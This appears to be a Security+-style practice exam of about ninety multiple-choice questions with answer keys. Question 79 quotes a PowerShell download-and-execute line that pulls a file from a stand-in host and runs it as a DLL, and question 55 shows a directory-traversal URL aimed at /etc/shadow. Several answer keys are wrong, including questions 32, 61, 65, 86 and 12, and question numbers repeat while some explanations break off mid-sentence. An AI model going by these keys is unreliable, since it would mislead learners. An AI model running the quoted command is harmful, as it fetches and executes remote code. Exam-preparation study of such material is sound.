300-400

Question 1

A security analyst discovers that a company’s username and password database was posted on an Internet forum. The usernames and passwords are stored in plain text. Which of the following would mitigate the damage done by this type of data exfiltration in the future?

A. Create DLP controls that prevent documents from leaving the network.
B. Implement salting and hashing.
C. Configure the web content filter to block access to the forum.
D. Increase password complexity requirements.

Answer 1

B. Implement salting and hashing.

Question 2

Joe, an employee, receives an email stating he won the lottery. The email includes a link that requests a name, mobile phone number, address, and date of birth be provided to confirm Joe’s identity before sending him the prize. Which of the following BEST describes this type of email?

A. Spear phishing
B. Whaling
C. Phishing
D. Vishing

Answer 2

C. Phishing

Question 3

A company deployed a WiFi access point in a public area and wants to harden the configuration to make it more secure. After performing an assessment, an analyst identifies that the access point is configured to use WPA3, AES, WPS, and RADIUS. Which of the following should the analyst disable to enhance the access point security?

A. WPA3
B. AES
C. RADIUS
D. WPS

Answer 3

D. WPS

Question 4

Which of the following would be used to find the MOST common web-application vulnerabilities?

A. OWASP
B. MITRE ATT&CK
C. Cyber Kill Chain
D. SDLC

Answer 4

A. OWASP

Question 5

A network engineer is troubleshooting wireless network connectivity issues that were reported by users. The issues are occurring only in the section of the building that is closest to the parking lot. Users are intermittently experiencing slow speeds when accessing websites and are unable to connect to network drives. The issues appear to increase when laptop users return to their desks after using their devices in other areas of the building. There have also been reports of users being required to enter their credentials on web pages in order to gain access to them. Which of the following is the MOST likely cause of this issue?

A. An external access point is engaging in an evil-twin attack.
B. The signal on the WAP needs to be increased in that section of the building.
C. The certificates have expired on the devices and need to be reinstalled.
D. The users in that section of the building are on a VLAN that is being blocked by the firewall

Answer 5

A. An external access point is engaging in an evil-twin attack. Most Voted

Question 6

A security administrator suspects there may be unnecessary services running on a server. Which of the following tools will the administrator MOST likely use to confirm the suspicions?

A. Nmap
B. Wireshark
C. Autopsy
D. DNSEnum

Answer 6

A. Nmap

Nmap (Network Mapper) is a powerful network scanning tool that can be used to discover open ports and services running on a server.

Question 7

A vulnerability has been discovered and a known patch to address the vulnerability does not exist. Which of the following controls works BEST until a proper fix is released?

A. Detective
B. Compensating
C. Deterrent
D. Corrective

Answer 7

B.Compensating

Compensating controls are alternative security measures that are implemented in the absence of a specific control or when the existing control is insufficient to mitigate a risk.

Question 8

While reviewing pcap data, a network security analyst is able to locate plaintext usernames and passwords being sent from workstations to network switches. Which of the following is the security analyst MOST likely observing?

A. SNMP traps
B. A Telnet session
C. An SSH connection
D. SFTP traffic

Answer 8

B. A Telnet session

Question 9

An attacker replaces a digitally signed document with another version that goes unnoticed. Upon reviewing the document’s contents, the author notices some additional verbiage that was not originally in the document but cannot validate an integrity issue. Which of the following attacks was used?

A. Cryptomalware
B. Hash substitution
C. Collision
D. Phishing

Answer 9

C. Collision

Question 10

A security analyst notices that specific files are being deleted each time a systems administrator is on vacation. Which of the following BEST describes the type of malware that is running?

A. Fileless virus
B. Logic bomb
C. Keylogger
D. Ransomware

Answer 10

B. Logic bomb

Question 11

Which of the following involves the inclusion of code in the main codebase as soon as it is written?

A. Continuous monitoring
B. Continuous deployment
C. Continuous validation
D. Continuous integration

Answer 11

D. Continuous integration

Question 12

Which of the following can reduce vulnerabilities by avoiding code reuse?

A. Memory management
B. Stored procedures
C. Normalization
D. Code obfuscation

Answer 12

D. Code obfuscation

Code obfuscation is a technique used to make code more difficult to understand or reverse enginee

Question 13

The technology department at a large global company is expanding its Wi-Fi network infrastructure at the headquarters building. Which of the following should be closely coordinated between the technology, cybersecurity, and physical security departments? Select

A. Authentication protocol
B. Encryption type
C. WAP placement
D. VPN configuration

Answer 13

C. WAP placement

Question 14

Which of the following is an example of risk avoidance?

A. Installing security updates directly in production to expedite vulnerability fixes
B. Buying insurance to prepare for financial loss associated with exploits
C. Not installing new software to prevent compatibility errors
D. Not taking preventive measures to stop the theft of equipment

Answer 14

C. Not installing new software to prevent compatibility errors

Question 15

A security administrator needs to block a TCP connection using the corporate firewall. Because this connection is potentially a threat, the administrator does not want to send back an RST (Reset Packet) . Which of the following actions in the firewall rule would work BEST?

A. Drop
B. Reject
C. Log alert
D. Permit

Answer 15

A. Drop

Question 15

A security team discovered a large number of company-issued devices with non-work-related software installed. Which of the following policies would MOST likely contain language that would prohibit this activity?

A. NDA
B. BPA
C. AUP
D. SLA

Answer 15

C. AUP - Acceptable Use Policy

Question 16

Which of the following BEST describes data streams that are compiled through artificial intelligence that provides insight on current cyberintrusions, phishing, and other malicious cyberactivity?

A. Intelligence fusion
B. Review reports
C. Log reviews
D. Threat feeds

Answer 16

D. Threat feeds

Question 17

Which of the following would be the BEST resource for a software developer who is looking to improve secure coding practices for web applications?

A. OWASP
B. Vulnerability scan results
C. NIST CSF
D. Third-party libraries

Answer 17

A. OWASP

Question 18

Ann, a customer, received a notification from her mortgage company stating her PII may be shared with partners, affiliates, and associates to maintain day-to-day business operations. Which of the following documents did Ann receive?

A. An annual privacy notice
B. A non-disclosure agreement
C. A privileged-user agreement
D. A memorandum of understanding

Answer 18

A. An annual privacy notice

Question 19

A Chief Information Security Officer (CISO) is evaluating the dangers involved in deploying a new ERP (Enterprise Resource Planning) system for the company. The CISO categorizes the system, selects the controls that apply to the system, implements the controls, and then assesses the success of the controls before authorizing the system. Which of the following is the CISO using to evaluate the environment for this new ERP system?

A. The Diamond Model of Intrusion Analysis
B. CIS Critical Security Controls
C. NIST Risk Management Framework
D. ISO 27002

Answer 19

C. NIST Risk Management Framework is the framework

the CISO is using to evaluate the environment for this new ERP system. The NIST Risk Management Framework (RMF) is a structured approach to managing information security risk that is used by organizations to ensure the confidentiality, integrity, and availability of their information systems and data.

Question 20

A manufacturing company has several one-off legacy information systems that cannot be migrated to a newer OS due to software compatibility issues. The OSs are still supported by the vendor, but the industrial software is no longer supported. The Chief Information Security Officer has created a resiliency plan for these systems that will allow OS patches to be installed in a non-production environment, while also creating backups of the systems for recovery. Which of the following resiliency techniques will provide these capabilities?

A. Redundancy
B. RAID 1+5
C. Virtual machines
D. Full backups

Answer 20

C. Virtual machines

Question 21

A retail store has a business requirement to deploy a kiosk computer in an open area. The kiosk computer’s operating system has been hardened and tested. A security engineer is concerned that someone could use removable media to install a rootkit. Which of the following should the security engineer configure to BEST protect the kiosk computer?

A. Measured boot
B. Boot attestation
C. UEFI
D. EDR

Answer 21

A. Measured boot

Measured Boot is a new feature of Windows 8 that was created to help better protect your machine from rootkits and other malware. Measured Boot will check each start up component including the firmware all the way to the boot drivers and it will store this information in what is called a Trusted Platform Module (TPM).

Question 22

A company is implementing MFA for all applications that store sensitive data. The IT manager wants MFA to be non-disruptive and user friendly. Which of the following technologies should the IT manager use when implementing MFA?

A. One-time passwords
B. Email tokens
C. Push notifications
D. Hardware authentication

Answer 22

C. Push notifications

Question 23

A security engineer is reviewing the logs from a SAML application that is configured to use MFA. During this review, the engineer notices a high volume of successful logins that did not require MFA from users who were traveling internationally. The application, which can be accessed without a VPN, has a policy that allows time-based tokens to be generated. Users who change locations should be required to reauthenticate but have been able to log in without doing so. Which of the following statements BEST explains the issue?

A. OpenID is mandatory to make the MFA requirements work.
B. An incorrect browser has been detected by the SAML application.
C. The access device has a trusted certificate installed that is overwriting the session token.
D. The user’s IP address is changing between logins, but the application is not invalidating the token.

Answer 23

D. The user’s IP address is changing between logins, but the application is not invalidating the token. Most Voted

Question 24

An organization wants to enable built-in FDE on all laptops. Which of the following should the organization ensure is installed on all laptops?

A. TPM
B. CA
C. SAML
D. CRL

Answer 24

A. TPM
Trusted Platform Module (TPM)

Question 25

A security analyst needs to centrally manage credentials and permissions to the company’s network devices. The following security requirements must be met:

• All actions performed by the network staff must be logged.
• Per-command permissions must be possible.
• The authentication server and the devices must communicate through TCP.

Which of the following authentication protocols should the analyst choose?

A. Kerberos
B. CHAP
C. TACACS+
D. RADIUS

Answer 25

C. TACACS+

TACACS+ uses TCP traffic to provide authentication, authorization, and accounting services. It provides full-packet encryption as well as granular command controls, allowing individual commands to be secured as needed.

Question 26

An organization is concerned about intellectual property theft by employees who leave the organization. Which of the following should the organization MOST likely implement?

A. CBT
B. NDA
C. MOU
D. AUP

Answer 26

B. NDA

Question 27

A network manager is concerned that business may be negatively impacted if the firewall in its data center goes offline. The manager would like to implement a high availability pair to:

A. decrease the mean time between failures.
B. remove the single point of failure.
C. cut down the mean time to repair.
D. reduce the recovery time objective.

Answer 27

B. remove the single point of failure.

Question 28

A major manufacturing company updated its internal infrastructure and just recently started to allow OAuth applications to access corporate data. Data leakage is now being reported. Which of the following MOST likely caused the issue?

A. Privilege creep
B. Unmodified default settings
C. TLS protocol vulnerabilities
D. Improper patch management

Answer 28

A. Privilege creep

Question 29

While preparing a software inventory report, a security analyst discovers an unauthorized program installed on most of the company’s servers. The program utilizes the same code signing certificate as an application deployed to only the accounting team. After removing the unauthorized program, which of the following mitigations should the analyst implement to BEST secure the server environment?

A. Revoke the code signing certificate used by both programs.
B. Block all unapproved file hashes from installation
C. Add the accounting application file hash to the allowed list.
D. Update the code signing certificate for the approved application.

Answer 29

A. Revoke the code signing certificate used by both programs.

Question 30

A security analyst is reviewing the latest vulnerability scan report for a web server following an incident. The vulnerability report showed no concerning findings. The vulnerability that was used to exploit the server is present in historical vulnerability scan reports, and a patch is available for the vulnerability. Which of the following is the MOST likely cause?

A. Security patches failed to install due to a version incompatibility.
B. An adversary altered the vulnerability scan reports.
C. A zero-day vulnerability was used to exploit the web server.
D. The scan reported a false negative for the vulnerability.

Answer 30

D. The scan reported a false negative for the vulnerability.

Question 31

The help desk has received calls from users in multiple locations who are unable to access core network services. The network team has identified and turned off the network switches using remote commands. Which of the following actions should the network team take NEXT?

A. Disconnect all external network connections from the firewall.
B. Send response teams to the network switch locations to perform updates.
C. Turn on all the network switches by using the centralized management software.
D. Initiate the organization’s incident response plan.

Answer 31

D. Initiate the organization’s incident response plan.

Question 32

An attacker is trying to gain access by installing malware on a website that is known to be visited by the target victims. Which of the following is the attacker MOST likely attempting?

A. A spear-phishing attack
B. A watering-hole attack
C. Typo squatting
D. A phishing attack

Answer 32

C. Typo squatting

Question 33

An organization is moving away from the use of client-side and server-side certificates for EAP ( Extensible Authentication Protocol (EAP). The company would like for the new EAP solution to have the ability to detect rogue access points. Which of the following would accomplish these requirements?

A. PEAP
B. EAP-FAST
C. EAP-TLS
D. EAP-TTLS

Answer 33

B. EAP-FAST authenticates by means of a PAC (Protected Access Credential) which can be managed dynamically by the authentication server.

The Extensible Authentication Protocol (EAP) is an authentication framework that allows for the use of different authentication methods for secure network access technologies

Question 34

A security team is engaging a third-party vendor to do a penetration test of a new proprietary application prior to its release. Which of the following documents would the third-party vendor MOST likely be required to review and sign?

A. SLA
B. NDA
C. MOU
D. AUP

Answer 34

B. NDA

Question 35

Which of the following is an administrative control that would be MOST effective to reduce the occurrence of malware execution?

A. Security awareness training
B. Frequency of NIDS updates
C. Change control procedures
D. EDR reporting cycle

Answer 35

A. Security awareness training

Question 36

Employees at a company are receiving unsolicited text messages on their corporate cell phones. The unsolicited text messages contain a password reset link. Which of the following attacks is being used to target the company?

A. Phishing
B. Vishing
C. Smishing
D. Spam

Answer 36

C. Smishing

Question 37

During a Chief Information Security Officer (CISO) convention to discuss security awareness, the attendees are provided with a network connection to use as a resource. As the convention progresses, one of the attendees starts to notice delays in the connection, and the HTTPS site requests are reverting to HTTP. Which of the following BEST describes what is happening?

A. Birthday collision on the certificate key
B. DNS hijacking to reroute traffic
C. Brute force to the access point
D. A SSL/TLS downgrade

Answer 37

D. A SSL/TLS downgrade

Question 38

A user enters a password to log in to a workstation and is then prompted to enter an authentication code. Which of the following MFA factors or attributes are being utilized in the authentication process? (Choose two.)

A. Something you know
B. Something you have
C. Somewhere you are
D. Someone you know
E. Something you are
F. Something you can do

Answer 38

A. Something you know
B. Something you have

Question 39

A company uses specially configured workstations for any work that requires administrator privileges to its Tier 0 and Tier 1 systems. The company follows a strict process to harden systems immediately upon delivery. Even with these strict security measures in place, an incident occurred from one of the workstations. The root cause appears to be that the SoC was tampered with or replaced. Which of the following MOST likely occurred?

A. Fileless malware
B. A downgrade attack
C. A supply-chain attack
D. A logic bomb
E. Misconfigured BIOS

Answer 39

C. A supply-chain attack

Question 40

Audit logs indicate an administrative account that belongs to a security engineer has been locked out multiple times during the day. The security engineer has been on vacation for a few days. Which of the following attacks can the account lockout be attributed to?

A. Backdoor
B. Brute-force
C. Rootkit
D. Trojan

Answer 40

B. Brute-force

Question 41

After installing a patch on a security appliance, an organization realized a massive data exfiltration had occurred. Which of the following BEST describes the incident?

A. Supply chain attack
B. Ransomware attack
C. Cryptographic attack
D. Password attack

Answer 41

A. Supply chain attack

Question 42

An information security manager for an organization is completing a PCI DSS self-assessment for the first time. Which of the following is the MOST likely reason for this type of assessment?

A. An international expansion project is currently underway.
B. Outside consultants utilize this tool to measure security maturity.
C. The organization is expecting to process credit card information.
D. A government regulator has requested this audit to be completed.

Answer 42

C. The organization is expecting to process credit card information.

Question 43

Physical access to the organization’s servers in the data center requires entry and exit through multiple access points: a lobby, an access control vestibule, three doors leading to the server floor, a door to the server floor itself, and eventually to a caged area solely for the organization’s hardware. Which of the following controls is described in this scenario?

A. Compensating
B. Deterrent
C. Preventive
D. Detective

Answer 43

C. Preventive

Preventive controls are security measures designed to minimize or eliminate vulnerabilities and reduce the likelihood of a security incident occurring. They aim to prevent unauthorized access or actions from occurring in the first place.

Question 44

A new security engineer has started hardening systems. One of the hardening techniques the engineer is using involves disabling remote logins to the NAS. Users are now reporting the inability to use SCP to transfer files to the NAS, even though the data is still viewable from the users’ PCs. Which of the following is the MOST likely cause of this issue?

A. TFTP was disabled on the local hosts.
B. SSH was turned off instead of modifying the configuration file.
C. Remote login was disabled in the networkd.conf instead of using the sshd.conf.
D. Network services are no longer running on the NAS.

Answer 44

B. SSH was turned off instead of modifying the configuration file. Most Voted

Question 45

An enterprise has hired an outside security firm to conduct penetration testing on its network and applications. The firm has been given the documentation only available to the customers of the applications. Which of the following BEST represents the type of testing that will occur?

A. Bug bounty
B. Black-box
C. Gray-box
D. White-box

Answer 45

C. Gray-box

Question 46

A network engineer and a security engineer are discussing ways to monitor network operations. Which of the following is the BEST method?

A. Disable Telnet and force SSH.
B. Establish a continuous ping.
C. Utilize an agentless monitor.
D. Enable SNMPv3 with passwords.

Answer 46

C. Utilize an agentless monitor.

Question 47

A company is switching to a remote work model for all employees. All company and employee resources will be in the cloud. Employees must use their personal computers to access the cloud computing environment. The company will manage the operating system. Which of the following deployment models is the company implementing?

A. CYOD
B. MDM
C. COPE
D. VDI

Answer 47

D. VDI

Question 47

A security analyst is looking for a solution to help communicate to the leadership team the severity levels of the organization’s vulnerabilities. Which of the following would BEST meet this need?

A. CVE
B. SIEM
C. SOAR
D. CVSS

Answer 47

D. CVSS

Question 48

A security administrator needs to inspect in-transit files on the enterprise network to search for PII, credit card data, and classification words. Which of the following would be the BEST to use?

A. IDS solution
B. EDR solution
C. HIPS software solution
D. Network DLP solution

Answer 48

D. Network DLP solution

Question 49

The Chief Executive Officer announced a new partnership with a strategic vendor and asked the Chief Information Security Officer to federate user digital identities using SAML-based protocols. Which of the following will this enable?

A. SSO
B. MFA
C. PKI
D. DLP

Answer 49

A. SSO

Question 50

An employee’s company account was used in a data breach. Interviews with the employee revealed:

• The employee was able to avoid changing passwords by using a previous password again.
• The account was accessed from a hostile, foreign nation, but the employee has never traveled to any other countries.

Which of the following can be implemented to prevent these issues from reoccurring? (Choose two.)

A. Geographic dispersal
B. Password complexity
C. Password history
D. Geotagging
E. Password lockout
F. Geofencing

Answer 50

C. Password history
F. Geofencing

Question 51

A large industrial system’s smart generator monitors the system status and sends alerts to third-party maintenance personnel when critical failures occur. While reviewing the network logs, the company’s security manager notices the generator’s IP is sending packets to an internal file server’s IP. Which of the following mitigations would be BEST for the security manager to implement while maintaining alerting capabilities?

A. Segmentation
B. Firewall allow list
C. Containment
D. Isolation

Answer 51

A. Segmentation

Question 52

Which of the following technologies is used to actively monitor for specific file types being transmitted on the network?

A. File integrity monitoring
B. Honeynets
C. Tcpreplay
D. Data loss prevention

Answer 52

D. Data loss prevention

Question 53

As part of the building process for a web application, the compliance team requires that all PKI certificates are rotated annually and can only contain wildcards at the secondary subdomain level. Which of the following certificate properties will meet these requirements?

A. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

B. HTTPS://app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

C. HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

D. HTTPS://*.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2023

Answer 53

C. HTTPS://*.app1.comptia.org, Valid from April 10 00:00:00 2021 - April 8 12:00:00 2022

Question 54

A global pandemic is forcing a private organization to close some business units and reduce staffing at others. Which of the following would be BEST to help the organization’s executives determine their next course of action?

A. An incident response plan
B. A communication plan
C. A disaster recovery plan
D. A business continuity plan

Answer 54

D. A business continuity plan

Question 55

A cybersecurity analyst reviews the log files from a web server and sees a series of files that indicate a directory traversal attack has occurred. Which of the following is the analyst MOST likely seeing?

A. http://sample.url.com/
B.http://sample.url.com/someotherpageonsite/../../../etc/shadow
C. http://sample.url.com/select-from-database-where-password-null
D. http://redirect.sameple.url.sampleurl.com/malicious-dns-redirect

Answer 55

B.http://sample.url.com/someotherpageonsite/../../../etc/shadow

Question 56

A candidate attempts to go to http://comptia.org but accidentally visits http://comptiia.org. The malicious website looks exactly like the legitimate website. Which of the following BEST describes this type of attack?

A. Reconnaissance
B. Impersonation
C. Typosquatting
D. Watering-hole

Answer 56

C. Typosquatting

Question 57

A retail executive recently accepted a job with a major competitor. The following week, a security analyst reviews the security logs and identifies successful logon attempts to access the departed executive’s accounts. Which of the following security practices would have addressed the issue?

A. A non-disclosure agreement
B. Least privilege
C. An acceptable use policy
D. Offboarding

Answer 57

D. Offboarding

Question 58

The marketing department at a retail company wants to publish an internal website to the internet so it is reachable by a limited number of specific, external service providers in a secure manner. Which of the following configurations would be BEST to fulfil this requirement?

A. NAC
B. ACL
C. WAF
D. NAT

Answer 58

B. ACL

Question 59

A network-connected magnetic resonance imaging (MRI) scanner at a hospital is controlled and operated by an outdated and unsupported specialized Windows OS. Which of the following is MOST likely preventing the IT manager at the hospital from upgrading the specialized OS?

A. The time needed for the MRI vendor to upgrade the system would negatively impact patients.
B. The MRI vendor does not support newer versions of the OS.
C. Changing the OS breaches a support SLA with the MRI vendor.
D. The IT team does not have the budget required to upgrade the MRI scanner.

Answer 59

B. The MRI vendor does not support newer versions of the OS.

Question 60

A company received a “right to be forgotten” request. To legally comply, the company must remove data related to the requester from its systems. Which of the following is the company MOST likely complying with?

A. NIST CSF
B. GDPR
C. PCI DSS
D. ISO 27001

Answer 60

B. GDPR

Question 61

An engineer wants to inspect traffic to a cluster of web servers in a cloud environment. Which of the following solutions should the engineer implement?

A. CASB
B. WAF
C. Load balancer
D. VPN

Answer 61

A. CASB

Cloud Access Security Broker

Question 61

A security team suspects that the cause of recent power consumption overloads is the unauthorized use of empty power outlets in the network rack. Which of the following options will mitigate this issue without compromising the number of outlets available?

A. Adding a new UPS dedicated to the rack
B. Installing a managed PDU
C. Using only a dual power supplies unit
D. Increasing power generator capacity

Answer 61

B. Installing a managed PDU

A managed PDU is a device that provides electrical power distribution to equipment in a rack. It allows for individual monitoring and control of power outlets. By installing a managed PDU,

Question 62

A security analyst needs to implement an MDM solution for BYOD users that will allow the company to retain control over company emails residing on the devices and limit data exfiltration that might occur if the devices are lost or stolen. Which of the following would BEST meet these requirements? (Choose two.)

A. Full device encryption
B. Network usage rules
C. Geofencing
D. Containerization
E. Application approval list
F. Remote control

Answer 62

D. Containerization
F. Remote control

Question 63

A security administrator is evaluating remote access solutions for employees who are geographically dispersed. Which of the following would provide the MOST secure remote access? (Choose two.)

A. IPSec
B. SFTP
C. SRTP
D. LDAPS
E. S/MIME
F. SSL VPN

Answer 63

A. IPSec
F. SSL VPN

Question 64

A malicious actor recently penetrated a company’s network and moved laterally to the data center. Upon investigation, a forensics firm wants to know what was in the memory on the compromised server. Which of the following files should be given to the forensics firm?

A. Security
B. Application
C. Dump
D. Syslog

Answer 64

C. Dump

Question 65

A company is looking to migrate some servers to the cloud to minimize its technology footprint. The company has a customer relationship management system on premises. Which of the following solutions will require the LEAST infrastructure and application support from the company?

A. SaaS
B. IaaS
C. PaaS
D. SDN

Answer 65

C. PaaS

PaaS provides a cloud-based platform for developing, running, managing applications.  The cloud services provider hosts, manages and maintains all the hardware and software included in the platform - servers (for development, testing and deployment), operating system (OS) software, storage, networking, databases, middleware, runtimes, frameworks, development tools - as well as

Question 66

A network administrator needs to determine the sequence of a server farm’s logs. Which of the following should the administrator consider? (Choose two.)

A. Chain of custody
B. Tags
C. Reports
D. Time stamps
E. Hash values
F. Time offset

Answer 66

D. Time stamps
F. Time offset

Question 67

Which of the following is the BEST reason to maintain a functional and effective asset management policy that aids in ensuring the security of an organization?

A. To provide data to quantify risk based on the organization’s systems
B. To keep all software and hardware fully patched for known vulnerabilities
C. To only allow approved, organization-owned devices onto the business network
D. To standardize by selecting one laptop model for all users in the organization

Answer 67

A. To provide data to quantify risk based on the organization’s systems

Question 68

A security administrator, who is working for a government organization, would like to utilize classification and granular planning to secure top secret data and grant access on a need-to-know basis. Which of the following access control schemas should the administrator consider?

A. Mandatory
B. Rule-based
C. Discretionary
D. Role-based

Answer 68

A. Mandatory

Question 69

An organization is outlining data stewardship roles and responsibilities. Which of the following employee roles would determine the purpose of data and how to process it?

A. Data custodian
B. Data controller
C. Data protection officer
D. Data processor

Answer 69

B. Data controller

Question 70

Multiple beaconing activities to a malicious domain have been observed. The malicious domain is hosting malware from various endpoints on the network. Which of the following technologies would be BEST to correlate the activities between the different endpoints?

A. Firewall
B. SIEM
C. IPS
D. Protocol analyzer

Answer 70

B. SIEM

Question 71

Which of the following types of controls is a turnstile?

A. Physical
B. Detective
C. Corrective
D. Technical

Answer 71

A. Physical

Question 72

Users report access to an application from an internal workstation is still unavailable to a specific server, even after a recent firewall rule implementation that was requested for this access. ICMP traffic is successful between the two devices. Which of the following tools should the security analyst use to help identify if the traffic is being blocked?

A. nmap
B. tracert
C. ping
D. ssh

Answer 72

A. nmap

Question 73

As part of annual audit requirements, the security team performed a review of exceptions to the company policy that allows specific users the ability to use USB storage devices on their laptops. The review yielded the following results:

• The exception process and policy have been correctly followed by the majority of users.
• A small number of users did not create tickets for the requests but were granted access.
• All access had been approved by supervisors.
• Valid requests for the access sporadically occurred across multiple departments.
• Access, in most cases, had not been removed when it was no longer needed.

Which of the following should the company do to ensure that appropriate access is not disrupted but unneeded access is removed in a reasonable time frame?

A. Create an automated, monthly attestation process that removes access if an employee’s supervisor denies the approval.
B. Remove access for all employees and only allow new access to be granted if the employee’s supervisor approves the request.
C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team.
D. Implement a ticketing system that tracks each request and generates reports listing which employees actively use USB storage devices.

Answer 73

C. Perform a quarterly audit of all user accounts that have been granted access and verify the exceptions with the management team. Most Voted

Question 74

A financial institution would like to store its customer data in a cloud but still allow the data to be accessed and manipulated while encrypted. Doing so would prevent the cloud service provider from being able to decipher the data due to its sensitivity. The financial institution is not concerned about computational overheads and slow speeds. Which of the following cryptographic techniques would BEST meet the requirement?

A. Asymmetric
B. Symmetric
C. Homomorphic
D. Ephemeral

Answer 74

C. Homomorphic

Homomorphic encryption is a form of encryption that allows computations to be performed on encrypted data without decrypting it. This means that the cloud service provider cannot decipher the data even when performing operations on it.

Question 75

A cryptomining company recently deployed a new antivirus application to all of its mining systems. The installation of the antivirus application was tested on many personal devices, and no issues were observed. Once the antivirus application was rolled out to the servers, constant issues were reported. As a result, the company decided to remove the mining software. The antivirus application was MOST likely classifying the software as:

A. a rootkit.
B. a PUP.
C. a backdoor.
D. ransomware.
E. a RAT.

Answer 75

B. a PUP.

Question 76

A cybersecurity administrator is using iptables as an enterprise firewall. The administrator created some rules, but the network now seems to be unresponsive. All connections are being dropped by the firewall. Which of the following would be the BEST option to remove the rules?

A. # iptables -t mangle -X
B. # iptables -F
C. # iptables -Z
D. # iptables -P INPUT -j DROP

Answer 76

B. # iptables -F

Question 77

An incident response technician collected a mobile device during an investigation. Which of the following should the technician do to maintain chain of custody?

A. Document the collection and require a sign-off when possession changes.
B. Lock the device in a safe or other secure location to prevent theft or alteration.
C. Place the device in a Faraday cage to prevent corruption of the data.
D. Record the collection in a blockchain-protected public ledger.

Answer 77

A. Document the collection and require a sign-off when possession changes. Most Voted

Question 78

A company recently implemented a patch management policy; however, vulnerability scanners have still been flagging several hosts, even after the completion of the patch process. Which of the following is the MOST likely cause of the issue?

A. The vendor firmware lacks support.
B. Zero-day vulnerabilities are being discovered.
C. Third-party applications are not being patched.
D. Code development is being outsourced.

Answer 78

C. Third-party applications are not being patched.

Question 79

Which of the following controls would provide the BEST protection against tailgating?

A. Access control vestibule
B. Closed-circuit television
C. Proximity card reader
D. Faraday cage

Answer 79

A. Access control vestibule

Question 79

An employee received an email with an unusual file attachment named Updates.lnk. A security analyst is reverse engineering what the file does and finds that it executes the following script:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -URI https://somehost.com/04EB18.jpg -OutFile $env:TEMP\autoupdate.dll;Start-Process rundl132.exe $env:TEMP\autoupdate.dll

Which of the following BEST describes what the analyst found?

A. A PowerShell code is performing a DLL injection.
B. A PowerShell code is displaying a picture.
C. A PowerShell code is configuring environmental variables.
D. A PowerShell code is changing Windows Update settings.

Answer 79

A. A PowerShell code is performing a DLL injection.

Question 80

A penetration tester executes the command crontab -l while working in a Linux server environment. The penetration tester observes the following string in the current user’s list of cron jobs:

*/10 * * * * root /writable/update.sh

Which of the following actions should the penetration tester perform NEXT?

A. Privilege escalation
B. Memory leak
C. Directory traversal
D. Race condition

Answer 80

A. Privilege escalation

Question 81

An organization’s Chief Information Security Officer is creating a position that will be responsible for implementing technical controls to protect data, including ensuring backups are properly maintained. Which of the following roles would MOST likely include these responsibilities?

A. Data protection officer
B. Data owner
C. Backup administrator
D. Data custodian
E. Internal auditor

Answer 81

D. Data custodian

Question 82

Which of the following BEST describes the team that acts as a referee during a penetration-testing exercise?

A. White team
B. Purple team
C. Green team
D. Blue team
E. Red team

Answer 82

A. White team

Question 83

Which of the following would MOST likely be identified by a credentialed scan but would be missed by an uncredentialed scan?

A. Vulnerabilities with a CVSS score greater than 6.9.
B. Critical infrastructure vulnerabilities on non-IP protocols.
C. CVEs related to non-Microsoft systems such as printers and switches.
D. Missing patches for third-party software on Windows workstations and servers.

Answer 83

D. Missing patches for third-party software on Windows workstations and servers.

Question 84

A security administrator is seeking a solution to prevent unauthorized access to the internal network. Which of the following security solutions should the administrator choose?

A. MAC filtering
B. Anti-malware
C. Translation gateway
D. VPN

Answer 84

D. VPN

Question 85

A host was infected with malware. During the incident response, Joe, a user, reported that he did not receive any emails with links, but he had been browsing the internet all day. Which of the following would MOST likely show where the malware originated?

A. The DNS logs
B. The web server logs
C. The SIP traffic logs
D. The SNMP logs

Answer 85

A. The DNS logs

Question 86

A third party asked a user to share a public key for secure communication. Which of the following file formats should the user choose to share the key?

A. .pfx
B. .csr
C. .pvk
D. .cer

Answer 86

B. .csr

Question 87

A security administrator is working on a solution to protect passwords stored in a database against rainbow table attacks. Which of the following should the administrator consider?

A. Hashing
B. Salting
C. Lightweight cryptography
D. Steganography

Answer 87

B. Salting

Salting is a technique used in password hashing where a random value (salt) is generated and appended to each password before hashing

Question 88

A company wants to deploy PKI on its internet-facing website. The applications that are currently deployed are:

• www.company.com (main website)
• contactus.company.com (for locating a nearby location)
• quotes.company.com (for requesting a price quote)

The company wants to purchase one SSL certificate that will work for all the existing applications and any future applications that follow the same naming conventions, such as store.company.com. Which of the following certificate types would BEST meet the requirements?

A. SAN
B. Wildcard
C. Extended validation
D. Self-signed

Answer 88

B. Wildcard

Question 89

A security analyst is concerned about traffic initiated to the dark web from the corporate LAN. Which of the following networks should the analyst monitor?

A. SFTP
B. AIS
C. Tor
D. IoC

Answer 89

C. Tor